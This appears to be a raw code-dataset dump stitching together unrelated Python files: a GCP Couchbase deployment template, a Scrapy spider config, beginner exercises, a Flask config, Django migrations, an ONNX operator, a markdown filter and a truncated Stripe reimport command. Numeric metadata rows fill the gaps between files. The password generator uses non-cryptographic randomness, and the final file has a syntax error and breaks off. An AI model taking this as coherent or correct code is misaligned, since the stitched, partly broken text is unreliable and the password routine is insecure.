config['outputs'].append({
'name': outputName,
'value': '$(ref.deployment.%s)' % outputName
})
return config
def GetClusters(context):
clusters = []
regions = GetRegionsList(context)
for region in regions:
cluster = {
'cluster': region,
'region': region,
'groups':
[
{
'group': 'server',
'diskSize': context.properties['serverDiskSize'],
'nodeCount': context.properties['serverNodeCount'],
'nodeType': context.properties['serverNodeType'],
'services': ['data','query','index','fts', 'eventing', 'analytics']
}
]
}
if context.properties['syncGatewayNodeCount']>0:
cluster['groups'].append({
'group': 'syncgateway',
'diskSize': context.properties['syncGatewayDiskSize'],
'nodeCount': context.properties['syncGatewayNodeCount'],
'nodeType': context.properties['syncGatewayNodeType'],
'services': ['syncGateway']
})
clusters.append(cluster)
return clusters
def GetRegionsList(context):
regions = []
availableRegions = [
'us-central1',
'us-west1',
'us-east1',
'us-east4',
'europe-west1',
'europe-west2',
'europe-west3',
'asia-southeast1',
'asia-east1',
'asia-northeast1',
'australia-southeast1'
]
for region in availableRegions:
if context.properties[region]:
regions.append(region)
return regions
def GeneratePassword():
import random
categories = ['ABCDEFGHJKLMNPQRSTUVWXYZ', 'abcdefghijkmnopqrstuvwxyz', '123456789', '*-+.']
password=[]
for category in categories:
password.insert(random.randint(0, len(password)), random.choice(category))
while len(password) < 8:
password.insert(random.randint(0, len(password)), random.choice(''.join(categories)))
return ''.join(password)
| 30.859813 | 95 | 0.563598 | 239 | 3,302 | 7.786611 | 0.364017 | 0.091349 | 0.030629 | 0.037077 | 0.054809 | 0.054809 | 0.054809 | 0.054809 | 0.054809 | 0 | 0 | 0.010421 | 0.302544 | 3,302 | 106 | 96 | 31.150943 | 0.797655 | 0 | 0 | 0.073684 | 1 | 0 | 0.241369 | 0.014839 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042105 | false | 0.105263 | 0.021053 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
fe7c047bd66d0a7648e50742c88e2370588ae274 | 1,084 | py | Python | scraper/storage_spiders/myphamsachcomvn.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | null | null | null | scraper/storage_spiders/myphamsachcomvn.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | 10 | 2020-02-11T23:34:28.000Z | 2022-03-11T23:16:12.000Z | scraper/storage_spiders/myphamsachcomvn.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | 3 | 2018-08-05T14:54:25.000Z | 2021-06-07T01:49:59.000Z | # Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//div[@id='page']/div[2]/table/tbody/tr/td[3]/table[1]/tbody/tr[2]/td[2]/table/tbody/tr/td[2]/h1",
'price' : "//div[@id='page']/div[2]/table/tbody/tr/td[3]/table[@class='psub'][2]/tbody/tr[2]/td[3]/strong/font",
'category' : "//div[@class='address']/a[7]",
'description' : "//tbody/tr[2]/td[2]/table/tbody/tr/td[2]",
'images' : "//td[@class='psub']/div[1]/a[@class='thickbox']/img/@src",
'canonical' : "",
'base_url' : "",
'brand' : ""
}
name = 'myphamsach.com.vn'
allowed_domains = ['myphamsach.com.vn']
start_urls = ['http://myphamsach.com.vn/']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow = ['/[a-zA-Z0-9-]+_product_\d+_\d+.html']), 'parse_item'),
Rule(LinkExtractor(allow = ['/[a-zA-Z0-9-]+_product_\d+.html']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
| 40.148148 | 116 | 0.625461 | 157 | 1,084 | 4.210191 | 0.464968 | 0.07413 | 0.066566 | 0.078669 | 0.287443 | 0.287443 | 0.287443 | 0.287443 | 0.287443 | 0.178517 | 0 | 0.02199 | 0.119004 | 1,084 | 26 | 117 | 41.692308 | 0.670157 | 0.110701 | 0 | 0 | 1 | 0.130435 | 0.546306 | 0.400624 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fe85a27cc7c59903b98ab16f4d4c18e1b831b70b | 157 | py | Python | curso/PY2/for/ex5.py | smrsassa/Studying-Python | a5acbce42b85bdd6aea8058ca323fbbd12ce5c22 | [
"MIT"
] | 1 | 2019-10-21T18:19:13.000Z | 2019-10-21T18:19:13.000Z | curso/PY2/for/ex5.py | smrsassa/Studying-python | a5acbce42b85bdd6aea8058ca323fbbd12ce5c22 | [
"MIT"
] | null | null | null | curso/PY2/for/ex5.py | smrsassa/Studying-python | a5acbce42b85bdd6aea8058ca323fbbd12ce5c22 | [
"MIT"
] | null | null | null | ###exercicio 50
s = 0
for c in range (0, 6):
n = int(input('Digite um numero: '))
if n%2 == 0:
s += n
print ('{}'.format(s))
print ('Fim!!!') | 19.625 | 40 | 0.484076 | 27 | 157 | 2.814815 | 0.740741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061404 | 0.273885 | 157 | 8 | 41 | 19.625 | 0.605263 | 0.076433 | 0 | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
feb64cd89d592f6a6ab8393b1b121f22183e0a78 | 102 | py | Python | fun1.py | wards21-meet/meet2019y1lab6 | db53eb69052a8be5434cec7f8daeec4341793711 | [
"MIT"
] | null | null | null | fun1.py | wards21-meet/meet2019y1lab6 | db53eb69052a8be5434cec7f8daeec4341793711 | [
"MIT"
] | null | null | null | fun1.py | wards21-meet/meet2019y1lab6 | db53eb69052a8be5434cec7f8daeec4341793711 | [
"MIT"
] | null | null | null |
total = 0
for number in range(1, 10 + 1):
print(number)
total = total + number
print(total)
| 12.75 | 31 | 0.617647 | 16 | 102 | 3.9375 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 0.264706 | 102 | 7 | 32 | 14.571429 | 0.773333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
228d9730ac01858b41186cc99c661daf39b08656 | 1,338 | py | Python | the_project/special_scripts/paths.py | Sneeky-Man/The_Project | 9e5d805b089ae689b3d063fc9a05581674156ba2 | [
"MIT"
] | null | null | null | the_project/special_scripts/paths.py | Sneeky-Man/The_Project | 9e5d805b089ae689b3d063fc9a05581674156ba2 | [
"MIT"
] | null | null | null | the_project/special_scripts/paths.py | Sneeky-Man/The_Project | 9e5d805b089ae689b3d063fc9a05581674156ba2 | [
"MIT"
] | null | null | null | # import logging
#
# from the_project.constants import TEXTURE_DICT_PATH, TEXTURE_MAIN_PATH
# from os import path
#
#
# def PathMaker(object=str, tier=int, team=str):
# if tier == 0:
# file_path = f"{TEXTURE_MAIN_PATH}{TEXTURE_DICT_PATH[object]}_{team}.png"
# FileExists(file_path)
# return file_path
# else:
# file_path = f"{TEXTURE_MAIN_PATH}{TEXTURE_DICT_PATH[object]}_tier_{tier}_{team}.png"
# FileExists(file_path)
# return file_path
#
#
# def FileExists(file_path=str):
# """"
# This checks if a file exists
# :param file_path: The path to the file
# """"
# if path.exists(file_path) == False:
# logging.error(f"File to Path {file_path!r} has not been found")
# return False
# else:
# logging.debug(f"File {file_path!r} has been found")
#
#
#
# import logging
# from os import path
#
#
# def file_exists(file_path=str) -> bool:
# """"
# This checks if a file exists
#
# :param file_path: The path to the file
# :return: A True or False, depending on if the file exists
# """
#
# if not path.exists(file_path):
# logging.warning(f"File to Path {file_path!r} has not been found")
# return False
# else:
# logging.info(f"File {file_path!r} has been found")
# return True
| 27.306122 | 94 | 0.621824 | 190 | 1,338 | 4.2 | 0.247368 | 0.160401 | 0.045113 | 0.06015 | 0.596491 | 0.548872 | 0.548872 | 0.548872 | 0.385965 | 0.385965 | 0 | 0.001 | 0.252616 | 1,338 | 48 | 95 | 27.875 | 0.797 | 0.927504 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
22a89911c21cdc8b83d740ef5c7d05e504ee3076 | 522 | py | Python | _pyvmmonitor_core_tests/test_bounds.py | fabioz/pyvmmonitor-core | a39bb2c2839bf8155c1702d6c3ee4f3ae8ba3ee6 | [
"PSF-2.0"
] | 14 | 2015-02-28T01:31:39.000Z | 2022-03-09T10:02:39.000Z | _pyvmmonitor_core_tests/test_bounds.py | fabioz/pyvmmonitor-core | a39bb2c2839bf8155c1702d6c3ee4f3ae8ba3ee6 | [
"PSF-2.0"
] | null | null | null | _pyvmmonitor_core_tests/test_bounds.py | fabioz/pyvmmonitor-core | a39bb2c2839bf8155c1702d6c3ee4f3ae8ba3ee6 | [
"PSF-2.0"
] | 3 | 2015-04-05T08:31:43.000Z | 2021-08-05T07:48:32.000Z | def test_bounds():
from pyvmmonitor_core.math_utils import Bounds
bounds = Bounds()
assert not bounds.is_valid()
bounds.add_point((10, 10))
assert bounds.is_valid()
assert bounds.width == 0
assert bounds.height == 0
bounds.add_point((0, 0))
assert bounds.nodes == ((0, 0), (0, 10), (10, 10), (10, 0))
assert bounds.width == 10
assert bounds.height == 10
assert bounds.center == (5, 5)
x, y, w, h = bounds
assert (x, y, w, h) == (0, 0, 10, 10)
| 26.1 | 64 | 0.570881 | 77 | 522 | 3.779221 | 0.337662 | 0.28866 | 0.14433 | 0.041237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084881 | 0.277778 | 522 | 19 | 65 | 27.473684 | 0.687003 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
22aebaf959c926238ddce858456571a8264c642b | 221 | py | Python | venv/lib/python2.7/site-packages/newrelic-2.62.0.47/newrelic/__init__.py | CharleyFarley/ovvio | 81489ee64f91e4aab908731ce6ddf59edb9314bf | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/newrelic-2.62.0.47/newrelic/__init__.py | CharleyFarley/ovvio | 81489ee64f91e4aab908731ce6ddf59edb9314bf | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/newrelic-2.62.0.47/newrelic/__init__.py | CharleyFarley/ovvio | 81489ee64f91e4aab908731ce6ddf59edb9314bf | [
"MIT"
] | null | null | null | version = '2.62.0'
try:
from newrelic.build import build_number
except ImportError:
build_number = 0
version_info = list(map(int, version.split('.'))) + [build_number]
version = '.'.join(map(str, version_info))
| 22.1 | 66 | 0.696833 | 31 | 221 | 4.806452 | 0.612903 | 0.221477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026596 | 0.149321 | 221 | 9 | 67 | 24.555556 | 0.765957 | 0 | 0 | 0 | 0 | 0 | 0.036199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
22c501c8ec5fd7c30920ce61bf80b2121c6b3f41 | 2,601 | py | Python | config.py | fboaventura/flask-boilerplate | 9f81f1c8d5baddc326a30f64f1d7726dd55c7d4e | [
"MIT"
] | null | null | null | config.py | fboaventura/flask-boilerplate | 9f81f1c8d5baddc326a30f64f1d7726dd55c7d4e | [
"MIT"
] | 73 | 2021-03-22T14:24:20.000Z | 2022-03-31T23:46:50.000Z | config.py | fboaventura/flask-boilerplate | 9f81f1c8d5baddc326a30f64f1d7726dd55c7d4e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
Flask + Python3 application template
Author: Frederico Freire Boaventura <frederico@boaventura.net>
URL: https://gitlab.com/ffb-portfolio/websites/flask-boilerplate
https://github.com/fboaventura/flask-boilerplate
Licence: GPLv3
"""
import os
from dotenv import load_dotenv, dotenv_values
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv(os.path.join(basedir, '.env'))
cnf = dotenv_values()
class Config(object):
"""
Configuration base, for all environments.
"""
APP_NAME = os.environ.get('APP_NAME', 'MyAppName')
SECRET_KEY = os.environ.get('SECRET_KEY', 'SUPER_SECRET_PRODUCTION_KEY')
DEBUG = os.environ.get('DEBUG', False)
TESTING = os.environ.get('TESTING', False)
DB_SCHEMA = os.environ.get('DB_SCHEMA', 'sqlite')
DB_NAME = os.environ.get('DB_NAME', 'app.db')
DB_USERNAME = os.environ.get('DB_USERNAME')
DB_PASSWORD = os.environ.get('DB_PASSWORD')
DB_AUTH = '{}:{}'.format(DB_USERNAME, DB_PASSWORD) if DB_USERNAME else ''
DB_HOSTNAME = os.environ.get('DB_HOSTNAME')
DB_PORT = os.environ.get('DB_PORT', '')
if DB_SCHEMA and DB_SCHEMA == 'sqlite':
SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(os.path.join(basedir, DB_NAME))
elif DB_SCHEMA:
SQLALCHEMY_DATABASE_URI = '{}://{}@{}{}/{}'.format(DB_SCHEMA, DB_AUTH, DB_HOSTNAME, DB_PORT, DB_NAME)
SQLALCHEMY_TRACK_MODIFICATIONS = False
BOOTSTRAP_FONTAWESOME = True
CSRF_ENABLED = True
ADMINS = os.environ.get('ADMINS', [])
BABEL_DEFAULT_LOCALE = os.environ.get('LOCALE', 'en')
LANGUAGES = os.environ.get('LANGUAGES', ['en', 'pt_BR'])
BABEL_DEFAULT_TIMEZONE = os.environ.get('TIMEZONE', 'UTC')
MAIL_SERVER = os.environ.get('MAIL_SERVER', 'localhost')
MAIL_PORT = int(os.environ.get('MAIL_PORT', 25))
MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS', False)
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
MAIL_DEBUG = os.environ.get('MAIL_DEBUG', False)
COMPRESS_MIMETYPES = ['text/html', 'text/css', 'text/xml', 'application/json', 'application/javascript']
COMPRESS_LEVEL = 6
COMPRESS_MIN_SIZE = 500
CACHE_TYPE = 'simple'
# Get your reCaptcha key on: https://www.google.com/recaptcha/admin/create
# RECAPTCHA_PUBLIC_KEY = "6LffFNwSAAAAAFcWVy__EnOCsNZcG2fVHFjTBvRP"
# RECAPTCHA_PRIVATE_KEY = "6LffFNwSAAAAAO7UURCGI7qQ811SOSZlgU69rvv7"
class TestConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///app_test.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
| 40.640625 | 109 | 0.708958 | 339 | 2,601 | 5.19469 | 0.383481 | 0.102215 | 0.136286 | 0.0477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009425 | 0.143406 | 2,601 | 63 | 110 | 41.285714 | 0.780969 | 0.202614 | 0 | 0.047619 | 0 | 0 | 0.187592 | 0.034196 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.071429 | 0.047619 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
22c74d041532fa4b578de4df45ea5774943b49b4 | 796 | py | Python | backend/app/migrations/0006_auto_20220412_1034.py | griviala/garpix_page | 55f1d9bc6d1de29d18e15369bebcbef18811b5a4 | [
"MIT"
] | null | null | null | backend/app/migrations/0006_auto_20220412_1034.py | griviala/garpix_page | 55f1d9bc6d1de29d18e15369bebcbef18811b5a4 | [
"MIT"
] | null | null | null | backend/app/migrations/0006_auto_20220412_1034.py | griviala/garpix_page | 55f1d9bc6d1de29d18e15369bebcbef18811b5a4 | [
"MIT"
] | null | null | null | # Generated by Django 3.1 on 2022-04-12 10:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0005_textdescriptioncomponent'),
]
operations = [
migrations.AddField(
model_name='textcomponent',
name='text_en',
field=models.TextField(null=True, verbose_name='Текст'),
),
migrations.AddField(
model_name='textdescriptioncomponent',
name='description_en',
field=models.TextField(null=True, verbose_name='Описание'),
),
migrations.AddField(
model_name='textdescriptioncomponent',
name='text_en',
field=models.TextField(null=True, verbose_name='Текст'),
),
]
| 27.448276 | 71 | 0.599246 | 74 | 796 | 6.310811 | 0.5 | 0.115632 | 0.147752 | 0.173448 | 0.546039 | 0.546039 | 0.319058 | 0.319058 | 0.231263 | 0.231263 | 0 | 0.03169 | 0.286432 | 796 | 28 | 72 | 28.428571 | 0.790493 | 0.05402 | 0 | 0.545455 | 1 | 0 | 0.185087 | 0.10253 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
22f3f23e2f3138c5de4367b93f60084d322f5567 | 1,303 | py | Python | mlprodict/onnxrt/ops_cpu/op_compress.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 32 | 2018-03-04T23:33:30.000Z | 2022-03-10T19:15:06.000Z | mlprodict/onnxrt/ops_cpu/op_compress.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 184 | 2017-11-30T14:10:35.000Z | 2022-02-21T08:29:31.000Z | mlprodict/onnxrt/ops_cpu/op_compress.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 9 | 2019-07-24T13:18:00.000Z | 2022-03-07T04:08:07.000Z | # -*- encoding: utf-8 -*-
# pylint: disable=E0203,E1101,C0111
"""
@file
@brief Runtime operator.
"""
import numpy
from ..shape_object import ShapeObject
from ._op import OpRun, DefaultNone
class Compress(OpRun):
atts = {'axis': DefaultNone}
def __init__(self, onnx_node, desc=None, **options):
OpRun.__init__(self, onnx_node, desc=desc,
expected_attributes=Compress.atts,
**options)
def _run(self, x, condition): # pylint: disable=W0221
if self.inplaces.get(0, False):
return (numpy.compress(condition, x, axis=self.axis, out=x), )
return (numpy.compress(condition, x, axis=self.axis), )
def _infer_shapes(self, x, condition): # pylint: disable=W0221
return (ShapeObject(None, dtype=x.dtype), )
def _infer_types(self, x, condition): # pylint: disable=W0221
return (x, )
def to_python(self, inputs):
if self.axis is None:
return "import numpy\nreturn numpy.compress(%s, %s)" % tuple(inputs)
return "import numpy\nreturn numpy.compress(%s, %s, axis=%d)" % (
tuple(inputs) + (self.axis, ))
def _infer_sizes(self, x, condition): # pylint: disable=W0221
res = self.run(x, condition)
return (dict(temp=0), ) + res
| 31.780488 | 80 | 0.61627 | 161 | 1,303 | 4.857143 | 0.385093 | 0.08312 | 0.071611 | 0.102302 | 0.434783 | 0.383632 | 0.30179 | 0.204604 | 0 | 0 | 0 | 0.031536 | 0.245587 | 1,303 | 40 | 81 | 32.575 | 0.763988 | 0.13584 | 0 | 0 | 0 | 0 | 0.088949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0.2 | 0.08 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
22f711c37949b44d585d37012cc7f274251ad701 | 1,242 | py | Python | personal_env/lib/python3.8/site-packages/django/utils/topological_sort.py | jestinmwilson/personal-website | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | [
"MIT"
] | null | null | null | personal_env/lib/python3.8/site-packages/django/utils/topological_sort.py | jestinmwilson/personal-website | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | [
"MIT"
] | null | null | null | personal_env/lib/python3.8/site-packages/django/utils/topological_sort.py | jestinmwilson/personal-website | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | [
"MIT"
] | null | null | null | class CyclicDependencyError(ValueError):
pass
def topological_sort_as_sets(dependency_graph):
"""
Variation of Kahn's algorithm (1962) that returns sets.
Take a dependency graph as a dictionary of node => dependencies.
Yield sets of items in topological order, where the first set contains
all nodes without dependencies, and each following set contains all
nodes that may depend on the nodes only in the previously yielded sets.
"""
todo = dependency_graph.copy()
while todo:
current = {node for node, deps in todo.items() if not deps}
if not current:
raise CyclicDependencyError('Cyclic dependency in graph: {}'.format(
', '.join(repr(x) for x in todo.items())))
yield current
# remove current from todo's nodes & dependencies
todo = {node: (dependencies - current) for node, dependencies in
todo.items() if node not in current}
def stable_topological_sort(nodes, dependency_graph):
result = []
for layer in topological_sort_as_sets(dependency_graph):
for node in nodes:
if node in layer:
result.append(node)
return result
| 33.567568 | 81 | 0.644928 | 154 | 1,242 | 5.123377 | 0.428571 | 0.095057 | 0.041825 | 0.053232 | 0.091255 | 0.091255 | 0 | 0 | 0 | 0 | 0 | 0.004515 | 0.286634 | 1,242 | 36 | 82 | 34.5 | 0.886005 | 0.307568 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0.027778 | 0 | 1 | 0.105263 | false | 0.052632 | 0 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
22fd3d957808b6194bf8b8bdb701b95003ede090 | 404 | py | Python | PythonExercicios/ex027.py | Luis-Emanuel/Python | 92936dfb005b9755a53425d16c3ff54119eebe78 | [
"MIT"
] | null | null | null | PythonExercicios/ex027.py | Luis-Emanuel/Python | 92936dfb005b9755a53425d16c3ff54119eebe78 | [
"MIT"
] | null | null | null | PythonExercicios/ex027.py | Luis-Emanuel/Python | 92936dfb005b9755a53425d16c3ff54119eebe78 | [
"MIT"
] | null | null | null | #Faça um program que leia o nome completo de uma pessoa, mostrando em seguinda o primeiro e último nome separados.
#EX: Ana Maria de Sousa/ primeiro = Ana/ segundo = Sousa
nome = str(input('Digite seu nome completo: ')).strip().upper()
nomes = nome.split()
print('Muito prazer em te conhecer!')
print('Seu primeiro nome é {}'.format(nomes[0]))
print('Seu último nome é {}'.format(nomes[len(nomes) - 1]))
| 50.5 | 114 | 0.715347 | 65 | 404 | 4.446154 | 0.630769 | 0.083045 | 0.076125 | 0.110727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00578 | 0.143564 | 404 | 7 | 115 | 57.714286 | 0.82948 | 0.415842 | 0 | 0 | 0 | 0 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
22fea4bc6dbb3a13a1aabe2bb01cc844972acf47 | 951 | py | Python | apps/blog/templatetags/myapp_markup.py | haohaohihi/my_django_blog | 8115819d099566d5af75b9c2c8c4aca42b27f01b | [
"Apache-2.0"
] | null | null | null | apps/blog/templatetags/myapp_markup.py | haohaohihi/my_django_blog | 8115819d099566d5af75b9c2c8c4aca42b27f01b | [
"Apache-2.0"
] | null | null | null | apps/blog/templatetags/myapp_markup.py | haohaohihi/my_django_blog | 8115819d099566d5af75b9c2c8c4aca42b27f01b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import template
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
import mistune
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
register = template.Library()
class HighlightRenderer(mistune.Renderer):
def block_code(self, code, lang):
if not lang:
return '\n<pre><code>%s</code></pre>\n' % \
mistune.escape(code)
lexer = get_lexer_by_name(lang, stripall=True)
formatter = HtmlFormatter()
return highlight(code, lexer, formatter)
renderer = HighlightRenderer()
markdown = mistune.Markdown(renderer=renderer)
@register.filter(is_safe=True)
@stringfilter
def md1(value):
markdown = mistune.Markdown(renderer=renderer)
return mark_safe(markdown(value))
| 27.970588 | 56 | 0.701367 | 111 | 951 | 5.918919 | 0.468468 | 0.045662 | 0.030441 | 0.042618 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002635 | 0.201893 | 951 | 33 | 57 | 28.818182 | 0.862978 | 0.044164 | 0 | 0.086957 | 0 | 0 | 0.034325 | 0.034325 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.304348 | 0 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fe00e10bdb1af8b15403730b50edc27c8acb88b3 | 882 | py | Python | apps/profile/management/commands/reimport_stripe_history.py | Paul3MK/NewsBlur | f912d100c2867e5366fca92abadc50d4253a41d8 | [
"MIT"
] | 3,073 | 2015-01-01T07:20:18.000Z | 2022-03-31T20:33:41.000Z | apps/profile/management/commands/reimport_stripe_history.py | Paul3MK/NewsBlur | f912d100c2867e5366fca92abadc50d4253a41d8 | [
"MIT"
] | 1,054 | 2015-01-02T13:32:35.000Z | 2022-03-30T04:21:21.000Z | apps/profile/management/commands/reimport_stripe_history.py | Paul3MK/NewsBlur | f912d100c2867e5366fca92abadc50d4253a41d8 | [
"MIT"
] | 676 | 2015-01-03T16:40:29.000Z | 2022-03-30T14:00:40.000Z | import stripe, datetime, time
from django.conf import settings
from django.core.management.base import BaseCommand
from utils import log as logging
from apps.profile.models import Profile
class Command(BaseCommand):
def add_arguments(self, parser)
parser.add_argument("-d", "--days", dest="days", nargs=1, type='int', default=365, help="Number of days to go back")
parser.add_argument("-l", "--limit", dest="limit", nargs=1, type='int', default=100, help="Charges per batch")
parser.add_argument("-s", "--start", dest="start", nargs=1, type='string', default=None, help="Offset customer_id (starting_after)")
def handle(self, *args, **options):
limit = options.get('limit')
days = int(options.get('days'))
starting_after = options.get('start')
